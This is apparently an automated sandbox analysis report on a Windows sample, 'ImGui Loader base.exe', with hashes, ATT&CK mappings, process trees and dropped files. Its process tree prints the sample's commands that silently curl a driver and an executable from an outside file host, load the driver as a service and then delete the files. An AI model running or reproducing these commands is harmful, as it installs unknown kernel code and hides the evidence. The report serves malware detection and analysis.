1aba6ab0c6b1c019ebcd40f51e0415f45c40c5f6e3da6031810e21980cbbfa1d

Analysis

max time kernel
110s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ImGui Loader base (2)/ImGui Loader base.exe
Size

1.3MB
MD5

2e271eb3cc21cd6e2ccbe4497c044c57
SHA1

a55bc19447c2d37055a2e103169d6c6148f006b7
SHA256

d048adebea24b5a5094151b8820f83b8576cbaa002445aa7e71ff4c5a2850a04
SHA512

c1dc01877fc362e09e09fcea2c7e38da77d5d5b6b9713914af4e277d336e35071c73c710e9f065a908d290ebb7c3d78be111e51c3c07b46d13d856d05bf45f86
SSDEEP

24576:Uxotq1nlyb+6Rd0ZMqp+YFfXN9Bm0jpeze0Qtq7KN5J/RmfmaQll9Rnn10m:Uxbllybh+ZMq3s0g4q7KN5J/Rmfma29V

Score

8^/10

defense_evasion discovery persistence

Malware Config

Signatures

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

windrv.exewindrv.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\KXozGVggULMZWhTE\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\KXozGVggULMZWhTE"	windrv.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\FRgmyksKLcp\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\FRgmyksKLcp"	windrv.exe

Executes dropped EXE 2 IoCs

Processes:

windrv.exewindrv.exe

pid process

4548 windrv.exe
2428 windrv.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

pid	process
4548	windrv.exe
2428	windrv.exe

Drops file in Windows directory 4 IoCs

Processes:

curl.execurl.execurl.execurl.exe

description	ioc	process
File opened for modification	C:\Windows\System\windrv.sys	curl.exe
File opened for modification	C:\Windows\System\windrv.exe	curl.exe
File created	C:\Windows\System\windrv.sys	curl.exe
File created	C:\Windows\System\windrv.exe	curl.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133770526621964483"	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

windrv.exewindrv.exechrome.exe

pid process

4548 windrv.exe
4548 windrv.exe
2428 windrv.exe
2428 windrv.exe
3908 chrome.exe
3908 chrome.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ImGui Loader base.exe

pid process

536 ImGui Loader base.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

windrv.exewindrv.exe

pid process

4548 windrv.exe
2428 windrv.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

3908 chrome.exe
3908 chrome.exe
3908 chrome.exe
3908 chrome.exe

pid	process
4548	windrv.exe
4548	windrv.exe
2428	windrv.exe
2428	windrv.exe
3908	chrome.exe
3908	chrome.exe

pid	process
536	ImGui Loader base.exe

pid	process
4548	windrv.exe
2428	windrv.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

Processes:

windrv.exewindrv.exechrome.exe

description	pid	process
Token: SeLoadDriverPrivilege	4548	windrv.exe
Token: SeLoadDriverPrivilege	2428	windrv.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe
Token: SeShutdownPrivilege	3908	chrome.exe
Token: SeCreatePagefilePrivilege	3908	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe
3908	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ImGui Loader base.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exechrome.exe

description	pid	process	target process
PID 536 wrote to memory of 1788	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1788	536	ImGui Loader base.exe	cmd.exe
PID 1788 wrote to memory of 824	1788	cmd.exe	certutil.exe
PID 1788 wrote to memory of 824	1788	cmd.exe	certutil.exe
PID 1788 wrote to memory of 436	1788	cmd.exe	find.exe
PID 1788 wrote to memory of 436	1788	cmd.exe	find.exe
PID 1788 wrote to memory of 1152	1788	cmd.exe	find.exe
PID 1788 wrote to memory of 1152	1788	cmd.exe	find.exe
PID 536 wrote to memory of 1104	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1104	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1620	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1620	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 2472	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 2472	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3164	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3164	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 2888	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 2888	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4496	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4496	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4088	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4088	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 2440	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 2440	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3268	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3268	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4840	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4840	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3052	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3052	536	ImGui Loader base.exe	cmd.exe
PID 3052 wrote to memory of 1572	3052	cmd.exe	curl.exe
PID 3052 wrote to memory of 1572	3052	cmd.exe	curl.exe
PID 536 wrote to memory of 644	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 644	536	ImGui Loader base.exe	cmd.exe
PID 644 wrote to memory of 2184	644	cmd.exe	curl.exe
PID 644 wrote to memory of 2184	644	cmd.exe	curl.exe
PID 536 wrote to memory of 4564	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4564	536	ImGui Loader base.exe	cmd.exe
PID 4564 wrote to memory of 1840	4564	cmd.exe	curl.exe
PID 4564 wrote to memory of 1840	4564	cmd.exe	curl.exe
PID 536 wrote to memory of 3116	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3116	536	ImGui Loader base.exe	cmd.exe
PID 3116 wrote to memory of 3172	3116	cmd.exe	curl.exe
PID 3116 wrote to memory of 3172	3116	cmd.exe	curl.exe
PID 536 wrote to memory of 3468	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3468	536	ImGui Loader base.exe	cmd.exe
PID 3468 wrote to memory of 4548	3468	cmd.exe	windrv.exe
PID 3468 wrote to memory of 4548	3468	cmd.exe	windrv.exe
PID 536 wrote to memory of 4676	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 4676	536	ImGui Loader base.exe	cmd.exe
PID 4676 wrote to memory of 2428	4676	cmd.exe	windrv.exe
PID 4676 wrote to memory of 2428	4676	cmd.exe	windrv.exe
PID 536 wrote to memory of 3400	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 3400	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1772	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1772	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1060	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1060	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1440	536	ImGui Loader base.exe	cmd.exe
PID 536 wrote to memory of 1440	536	ImGui Loader base.exe	cmd.exe
PID 3908 wrote to memory of 2768	3908	chrome.exe	chrome.exe
PID 3908 wrote to memory of 2768	3908	chrome.exe	chrome.exe
PID 3908 wrote to memory of 548	3908	chrome.exe	chrome.exe
PID 3908 wrote to memory of 548	3908	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\ImGui Loader base (2)\ImGui Loader base.exe
"C:\Users\Admin\AppData\Local\Temp\ImGui Loader base (2)\ImGui Loader base.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ImGui Loader base (2)\ImGui Loader base.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ImGui Loader base (2)\ImGui Loader base.exe" MD5
    3⤵
    PID:824
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:436
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:1152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t7m8br.sys --output C:\Windows\System\windrv.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/t7m8br.sys --output C:\Windows\System\windrv.sys
    3⤵
    - Drops file in Windows directory
    PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/myhp71.bin --output C:\Windows\System\windrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:644
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/myhp71.bin --output C:\Windows\System\windrv.exe
    3⤵
    - Drops file in Windows directory
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t7m8br.sys --output C:\Windows\System\windrv.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/t7m8br.sys --output C:\Windows\System\windrv.sys
    3⤵
    - Drops file in Windows directory
    PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/myhp71.bin --output C:\Windows\System\windrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/myhp71.bin --output C:\Windows\System\windrv.exe
    3⤵
    - Drops file in Windows directory
    PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Windows\System\windrv.exe C:\Windows\System\windrv.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3468
- - C:\Windows\System\windrv.exe
    C:\Windows\System\windrv.exe C:\Windows\System\windrv.sys
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Windows\System\windrv.exe C:\Windows\System\windrv.sys
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Windows\System\windrv.exe
    C:\Windows\System\windrv.exe C:\Windows\System\windrv.sys
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System\windrv.exe
  2⤵
  PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System\windrv.sys
  2⤵
  PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System\windrv.exe
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System\windrv.sys
  2⤵
  PID:1440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffffe95cc40,0x7ffffe95cc4c,0x7ffffe95cc58
  2⤵
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2
  2⤵
  PID:548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:8
  2⤵
  PID:772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:4304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4868,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  PID:3224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8
  2⤵
  PID:2812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5128,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5404,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5364 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5396,i,3702057579979494256,9416340509328849932,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5600 /prefetch:8
  2⤵
  PID:732

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1592

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_soul-serial-checker-main.zip\soul-serial-checker-main\soul_serial_checker.bat" "
1⤵
PID:212
- C:\Windows\System32\Wbem\WMIC.exe
  wmic diskdrive get serialnumber
  2⤵
  PID:1804
- C:\Windows\System32\Wbem\WMIC.exe
  wmic baseboard get serialnumber
  2⤵
  PID:5044
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_computersystemproduct get uuid
  2⤵
  PID:2456
- C:\Windows\System32\Wbem\WMIC.exe
  wmic PATH Win32_VideoController GET Description,PNPDeviceID
  2⤵
  PID:3508
- C:\Windows\System32\Wbem\WMIC.exe
  wmic memorychip get serialnumber
  2⤵
  PID:1104
- C:\Windows\System32\Wbem\WMIC.exe
  wmic csproduct get uuid
  2⤵
  PID:3056
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get processorid
  2⤵
  PID:3220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
e91f96845ff46d6f9bdcc138c09da00b

SHA1
399fc6af9f03a7c0bbedbdf8e6e10e896824640c

SHA256
0f7955b440badc33076af9eec1720bd83a016d3f8ee43bbac5d9514602ec30b0

SHA512
4d1d899e9903207193585e479f36066a53e281e71bf5bb0a7838082aeabd3c4456466bbb3e9c3554912be01ea862af1031c3f61c9b42646da9f8886525c97a6d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
41f2ec544965d0ed7c8d1042a2d338b9

SHA1
9851ad21614501a88298886dbd652cb355c7d273

SHA256
fbc1534335c9486cee0269ae50762b1c9510f65d0c3e60e58eb953e78bbb6698

SHA512
1eb74e4f537e47e69e3415223e58e962d6a12fad6dc5d063202e5ecd5d0ea0cb9b6977fef161addca8291cb9af02ed49128bdea5e5ab3b8ee78d66ad22ade3ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
30684af19cecc1d6cc1d8513345fe1cf

SHA1
6b84bd3dc6961021ccf0b181e0e2173af829692c

SHA256
7f5277146edb814e8760a14d7628f2d9463a08b5ab90d8aeb00d26cc9b931238

SHA512
3b370be8461561abce15f873c87a4c5969c17129022b60b6f1a65e13efa73f930d522e4b57575b3dc91c4b54cc310e7bb36af02cc95d126febec84c57772abf6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
e936c458cfb04207553524f02a4f25fd

SHA1
6115e368ac468a06af9758e9890110a745945610

SHA256
e448298be30764e3f560cb77421ec34e568593832cd8c0f1861802439dc82729

SHA512
61b40eef279df77c8069850c0798df6f745c96689421f6b4655420f08b847087c38601ef033cf7dbd802cc9bbd3b78d1406d786f8a2b2c515601c2673ad81cac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
61c7cdd57bb6b5b55b7ca9dda0810309

SHA1
de5638f2028100827fe6a1180e01f051e56bfc34

SHA256
afabffac8195eea2645f3d5592bb84084cec5ebae8d39872e268d4767764ba65

SHA512
a8ad464a2c1b54baa2365dbc02034f1efb587fc555b78ca30c545224ec9e40394db68d691ef63ad9e64599ccefeda7c647eaa1c83eb243ab54a878425392afab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
3c9e6c78fe03ca05616b251cbf4fea00

SHA1
7d5741393297c60532da6b51e16a8097e709df33

SHA256
5818029497f8f9fe5882b4a542c12996cb5233173c7df70d345e80d44f193985

SHA512
